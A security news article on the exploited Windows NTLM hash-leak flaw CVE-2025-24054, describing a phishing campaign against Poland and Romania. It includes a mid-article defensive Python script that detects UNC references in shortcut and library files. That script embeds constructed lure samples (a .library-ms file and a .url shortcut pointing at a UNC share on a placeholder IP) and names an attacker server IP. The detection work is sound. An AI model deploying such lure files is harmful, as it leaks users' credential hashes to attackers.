Exploit Alert: NTLM Hash Vulnerability Hits Poland and Romania Post-Patch

2025-04-17

Author: John Tan

A New Security Nightmare Unleashed Soon After Patch

A critical security vulnerability allowing hackers to siphon off NTLM authentication hashes has been actively exploited, just days after Microsoft rolled out a fix. Known as CVE-2025-24054, this flaw impacts Windows systems and can be triggered by merely engaging with a specially crafted .library-ms file.

How the Exploit Works

When a user interacts with the malicious file—such as by navigating to its folder—Windows unwittingly initiates an SMB authentication request, exposing the NTLMv2-SSP hash to an attacker's server.

Timeline of Terror: Exploited Before Patches Were Deployed

Although Microsoft patched the issue on March 11, 2025, cybercriminals began capitalizing on this vulnerability by March 19. Researchers quickly observed an organized campaign aimed at institutions in Poland and Romania.

The Phishing Scheme Unveiled

Attackers cleverly employed malicious .library-ms files disseminated through Dropbox links embedded in phishing emails. Once downloaded, these files triggered the NTLM hash leak without requiring users to open or run them.

Expert Insights on the Threat

"The documentation from Microsoft indicated that the flaw could be activated with minimal user interaction, such as right-clicking or merely browsing to the folder containing the harmful file," noted Check Point Research. Furthermore, this exploit seems to share connections with a previously patched vulnerability, CVE-2024-43451.

Coordinated Campaigns and Rising Threat Levels

The first known exploit of this vulnerability took place around March 20-21, using a compressed file named xd.zip. This archive included four malicious components specifically designed to extract NTLMv2 hashes:

- **xd.library-ms**: Directly triggers CVE-2025-24054 to leak NTLMv2 hashes.

- **xd.url**: Linked to CVE-2024-43451, exploited via UNC path.

- **xd.website**: Utilizes UNC references to initiate SMB connections.

- **xd.lnk**: A shortcut that triggers hash leakage through SMB.
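Each of the text-based components above works the same way as the .library-ms flaw described under "How the Exploit Works": a stored location points at a UNC path, and Explorer resolves it by opening an outbound SMB connection. The following Python triage script is an added defensive example, not code from the article or from Check Point Research. It parses the three text formats from the list (.library-ms is an XML Library Description document; .url and .website are INI-style shortcuts), extracts every stored location, and reports any remote host a file would make Windows contact, so an analyst can flag such files in mail attachments or download folders before a user browses to them. The Library Description namespace is the documented Windows schema; the file names, sample documents and the 203.0.113.10 address are constructed for this example and are not indicators from the campaign. The binary .lnk format is not covered.

```python
"""Added defensive example: triage .library-ms / .url / .website files for
UNC references that would make Windows start an outbound SMB connection.
All sample inputs below are constructed for this example."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# \\host\share or \\host alone; the host part may not contain a path separator
UNC_RE = re.compile(r"^\\\\([^\\/]+)(?:[\\/]|$)")


def _local_name(tag: str) -> str:
    """Strip the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]


def remote_host(location: str):
    """Return the host a stored location would make Windows contact over SMB,
    or None if it is local (drive path, knownfolder: URI) or a plain web URL."""
    loc = location.strip()
    m = UNC_RE.match(loc)
    if m:
        return m.group(1)
    parts = urlsplit(loc)
    if parts.scheme.lower() in ("file", "smb") and parts.hostname:
        return parts.hostname
    return None


def library_ms_locations(xml_text: str):
    """Every <simpleLocation><url> in a Library Description document
    (namespace http://schemas.microsoft.com/windows/2009/library)."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    if _local_name(root.tag) != "libraryDescription":
        raise ValueError("root element is not a Windows libraryDescription")
    urls = []
    for el in root.iter():
        if _local_name(el.tag) == "simpleLocation":
            for child in el:
                if _local_name(child.tag) == "url" and child.text:
                    urls.append(child.text.strip())
    return urls


def ini_locations(text: str):
    """Values of every key=value line in an INI-style shortcut (.url, .website);
    URL=, IconFile= and WorkingDirectory= can all carry a UNC path."""
    vals = []
    for line in text.splitlines():
        line = line.strip()
        if "=" in line and not line.startswith(("[", ";")):
            vals.append(line.split("=", 1)[1].strip())
    return vals


def triage(filename: str, content: str):
    """Remote hosts the file would cause Windows to contact (empty list = clean)."""
    name = filename.lower()
    if name.endswith(".library-ms"):
        locations = library_ms_locations(content)
    elif name.endswith((".url", ".website")):
        locations = ini_locations(content)
    else:
        raise ValueError(f"unsupported file type: {filename}")
    hosts = []
    for loc in locations:
        host = remote_host(loc)
        if host and host not in hosts:
            hosts.append(host)
    return hosts


# Constructed sample: a normal library pointing at the Documents known folder.
BENIGN_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed sample: same document, but the location is a UNC share on a
# documentation-range address (TEST-NET-3), not a real campaign indicator.
SUSPICIOUS_LIBRARY = BENIGN_LIBRARY.replace(
    "knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}", r"\\203.0.113.10\share")

# Constructed sample .url whose icon is fetched from a UNC path.
SUSPICIOUS_URL = "\r\n".join([
    "[InternetShortcut]",
    "URL=https://example.invalid/",
    r"IconFile=\\203.0.113.10\share\x.ico",
    "IconIndex=0",
])

if __name__ == "__main__":
    for fname, body in [("benign.library-ms", BENIGN_LIBRARY),
                        ("xd.library-ms", SUSPICIOUS_LIBRARY),
                        ("xd.url", SUSPICIOUS_URL)]:
        hosts = triage(fname, body)
        print(f"{fname}: {'ALERT ' + ', '.join(hosts) if hosts else 'no remote locations'}")
```

The script only reads the files; it never resolves the locations it finds, so running it on a suspicious sample does not itself trigger the outbound SMB request. A non-empty result is the signal to quarantine the file and to check whether egress SMB (TCP 445) to the reported host is blocked at the perimeter.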

A Global Web of Malicious Activity

The SMB servers capturing these stolen credentials were traced back to various countries including Russia, Bulgaria, and Turkey. Notably, one such server, linked to IP address 159.196.128[.]120, had been previously flagged by HarfangLab for connections to APT28 (Fancy Bear), although a direct correlation to this campaign remains unconfirmed.

Surging Campaigns Detected

In the following days, Check Point Research identified about 10 more campaigns, with a particularly alarming wave surfacing by March 25. This iteration distributed unarchived .library-ms files that triggered NTLM hash leaks through minimal user interaction, raising the threat level significantly, especially for systems lacking SMB signing or NTLM relay protections.

Microsoft's Acknowledgment and Response

Recognizing the severity of this vulnerability, Microsoft issued a security patch on March 11, initially classified as CVE-2025-24071, but later corrected to its current designation, CVE-2025-24054.